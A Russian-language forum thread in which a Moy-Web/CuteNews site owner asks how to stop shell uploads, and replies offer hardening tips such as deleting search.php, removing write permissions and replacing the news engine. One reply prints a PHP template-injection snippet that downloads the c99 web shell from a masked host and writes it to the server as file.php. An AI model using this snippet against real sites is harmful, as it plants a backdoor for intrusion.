[question]Шеллы
У меня такой вопрос:
Я использую обвязку Moy-Web, но как известно она очень уязвима.При мне залили шелла в папку news, даже когда я ее переименовывал все равно заливали.(Слава богу это было намерено по моей просьбе для теста).
Итак вопрос : Как защитить Moy-web от заливания файлов на него?
— рас!11рас!1
Somesay: У меня такой вопрос:
Я использую обвязку Moy-Web, но как известно она очень уязвима.При мне залили шелла в папку news, даже когда я ее переименовывал все равно заливали.(Слава богу это было намерено по моей просьбе для теста).
Итак вопрос : Как защитить Moy-web от заливания файлов на него?
cutenews удали
— Оо
-=[BloodKill]=-: cutenews удали
Если я его удалю, то как добавлять новости?
morfeus: chmod убираем право на запись......
Как это сотворить?
— рас!11рас!1
Удалить search.php в cutenews, так же для безопасности убирать права на запись после добавления новостей.
Права редактируются через ftp.
Search.php удалил как установил обвяз.
Права на запись снял, но всеравно не помогает...
— рас!11рас!1
Единственный способ обезопасить МВ - удалить ее
По теме ответ дан - удалить папку News (новости в таком случае добавлять либо руками, либо используя более безопасный новостной движок) и по закрывать пару дыр.
Какие - уже обсуждалось на форуме.
На Форуме я тоже Radar!
Я везде Radar!
Или поставить ДЛЕ и не парить мосх.
Дам совет смени логин с root на какой тока сможеш придумать в коментах чтоб тока не ставились как бэ куй он зальёт шелл через шаблон.
Заливаетцо шелл в шаблоны через форму:
HTML;
$data=implode('',file('http://--/с99.php'));
$fp=fopen('./file.php','wb');
fputs($fp,$data);
fclose($fp);
удалить search.php
И не плохобы написать версию кутеневса тут не телепаты они в отпуске)


![-=[BloodKill]=-](/uploads/fotos/av-39301.jpg)


